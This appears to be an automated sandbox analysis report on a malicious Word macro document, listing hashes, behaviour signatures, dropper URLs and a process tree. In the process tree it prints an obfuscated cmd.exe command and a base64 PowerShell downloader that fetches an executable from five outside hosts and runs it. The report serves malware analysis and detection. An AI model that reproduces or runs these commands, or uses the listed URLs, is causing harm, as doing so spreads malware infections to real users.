Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    25-05-2024 06:08

General

  • Target

    71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc

  • Size

    76KB

  • MD5

    71136aab6cae39e138fab55e2f00a583

  • SHA1

    164bc374e50c579c0557ec32cd573afc907db362

  • SHA256

    aba5bddcd0584140102c5a904be47f3025b6ba796114bbd2039e272bf26d7be7

  • SHA512

    c1ed00716505531ef2a2c60ddd0e06e9a1bba03f10483a18f5eab07e91cd4283ebf03ea9f100d34657821e30cb1f17d0e0a273824cddeab4addef4523be7300e

  • SSDEEP

    1536:3nptJlmrJpmxlRw99NBq+ax4+6MT4I6Dhl93tCX:Zte2dw99fUn8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tresillosmunoz.com/2HB

exe.dropper

http://tonyleme.com.br/8l3XcSKQ

exe.dropper

http://sg2i.com/wwG

exe.dropper

http://lunacine.com/CQ

exe.dropper

http://www.yuanjhua.com/OwUzt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1400
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd /V/C"^s^e^t N^Y^GD==A^A^I^AAC^A^gA^A^I^A^AC^Ag^AA^IA^AC^AgAAI^AAC^A^g^AAIAAC^Ag^AAIA^AC^A^9BQf^AsH^AoBwY^A^QH^A^hBw^Y^A^0^H^A^7^A^w^a^AEGA^lBgcA^IG^A7^AQ^d^AIH^A^EB^AJAAC^At^BQ^ZAQHA^J^B^Q^LAUGArB^w^bAY^HAu^B^Q^S^As^D^A^p^AQd^AIH^AEB^A^JAAC^As^Aw^a^AkG^A^H^B^A^J^AgCAlB^Ab^AkGA^G^BAZAEGAvB^A^bA^4^G^A3Bw^b^AQE^A^uA^Q^a^A^0GA^GB^AJAsH^A5^BgcA^Q^HA^7B^QK^A^sG^AW^B^wSAQC^A^gAgb^A^kG^AgA^w^aA^kGAHBAJA^gCA^o^BwY^AE^G^Al^BgcA^8GA^m^Bw^O^AcCAl^BAeAU^G^A^uAwJAsCA1^Bw^QAoH^AkA^wKAcCAcBwJA^sC^A^j^BQaA^w^G^AiB^Qd^A^AH^A^6^Ag^d^A4^GAl^B^AJ^A0^DA^1BgcAQ^E^AkA^wO^AcCA^2^Ag^M^AUD^AnAAIA^0^D^Ag^A^Qd^A^MEA6B^A^JAsD^ApA^wJ^AA^EAnA^A^KA^QHAp^B^AbA^AH^ATB^g^L^AcC^A^0Bg^eAU^FA^3^BwTA^8CAt^Bw^bAMGA^u^A^QYAUHA^o^Bg^a^A4^GA^h^B^QdAkH^AuA^w^dAcHA^3B^wL^A^8C^A6AAc^AQ^H^A0^BAaAAEAR^Bw^Q^A^8C^A^tB^wbA^M^G^AuAQ^Z^A4GA^pB^wY^A^E^G^Au^BQ^d^A^wGAvAw^LAoDAw^BA^d^AQH^Ao^B^A^Q^AcEA^3^B^w^dA8C^At^Bw^bAM^G^A^u^A^QaA^IDAnB^wcA8C^AvAgO^A^A^H^A0^B^AdAg^GA^ABQ^U^A^s^EA^TB^wYAg^FAz^AAbA^gD^AvAgc^AIGA^u^AQbA8G^A^jB^gLAU^GAtBQ^ZA^w^GA5Bgb^A8^G^A^0^BwL^A^8C^A^6^A^AcAQH^A^0BAa^AA^EACB^ASAI^D^Av^A^Qb^A^8^GA^jB^gLAoH^Av^BgbAU^H^A^tBwc^A^8^GA^s^BA^b^A^kGAzBQZA^IH^A0B^w^LA8CA6^AAcA^QHA^0B^A^aAcCA9A^waA^Y^FAL^B^A^J^A^sD^A0B^g^b^AU^G^A^p^B^A^bA^M^E^A^i^B^QZAc^FAu^A^A^dA^U^GA^OBA^IA^QH^Aj^B^Q^ZAoGA^i^Bw^b^A0C^A^3BQ^Z^A^4GA9^AQa^A^0GAGBA^J e- ll^ehsr^e^wop&&^f^or /^L %^O ^in (9^0^5,^-1,0)^do ^s^et ^q0=!^q0!!N^Y^GD:~%^O,1!&&^i^f %^O ^l^e^q ^0 ca^l^l %^q0:^~^4%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABGAG0AaQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAFYAawA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAZQBzAGkAbABsAG8AcwBtAHUAbgBvAHoALgBjAG8AbQAvADIASABCAEAAaAB0AHQAcAA6AC8ALwB0AG8AbgB5AGwAZQBtAGUALgBjAG8AbQAuAGIAcgAvADgAbAAzAFgAYwBTAEsAUQBAAGgAdAB0AHAAOgAvAC8AcwBnADIAaQAuAGMAbwBtAC8AdwB3AEcAQABoAHQAdABwADoALwAvAGwAdQBuAGEAYwBpAG4AZQAuAGMAbwBtAC8AQwBRAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHkAdQBhAG4AagBoAHUAYQAuAGMAbwBtAC8ATwB3AFUAegB0ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJAB6AEMAdQAgAD0AIAAnADUAMgA2ACcAOwAkAEQAcgB1AD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAHoAQwB1ACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAawAgAGkAbgAgACQASwBWAGsAKQB7AHQAcgB5AHsAJABGAG0AaQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABHAGkAawAsACAAJABEAHIAdQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABEAHIAdQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2868

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      1dbaecd3b87de2efba212e35c56e986d

      SHA1

      31efdf0a47f8ff5753475853c956b6a5ac013992

      SHA256

      6a6d97fee855fd0d38bd07b71ef3c56a68b758f1a54ae0acac8d6e1b0c200c43

      SHA512

      069ee7a15f399428b9405e7f3d43f0e11ecd7ee08a4aa061bf9078ba7f19cbb10c4b80fae61a1601500d204cacb4d6eca40f7688d9aa82fe4d2eecd21bcee487

    • C:\Users\Admin\AppData\Local\Temp\Cab456B.tmp

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\Local\Temp\Tar49C2.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      da5f36dad8bcc407e5edaba05755e779

      SHA1

      b94bc2758eba2bec74d8b8951456732f1e2d4cdb

      SHA256

      8fe2ef7c233e97c57692abe63d1514fed6897c084c2527821fffb6a8b600079c

      SHA512

      5e35b7be15358dfe4b7360c3495bec001ceab5e942094ca4c8c7d65e727195b8a52bb90364811edf74b6fa3e0c509a3a26977db742e5141086da18813b61455f

    • memory/2408-10-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-31-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-9-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-0-0x000000002F5F1000-0x000000002F5F2000-memory.dmp

      Filesize

      4KB

    • memory/2408-11-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-12-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-14-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-15-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-30-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-26-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-33-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-8-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-18-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-22-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-125-0x00000000719CD000-0x00000000719D8000-memory.dmp

      Filesize

      44KB

    • memory/2408-124-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2408-7-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-6-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-2-0x00000000719CD000-0x00000000719D8000-memory.dmp

      Filesize

      44KB

    • memory/2408-108-0x00000000719CD000-0x00000000719D8000-memory.dmp

      Filesize

      44KB

    • memory/2408-109-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2868-41-0x0000000006020000-0x000000000605A000-memory.dmp

      Filesize

      232KB

    • memory/2868-40-0x0000000005FA0000-0x0000000005FD8000-memory.dmp

      Filesize

      224KB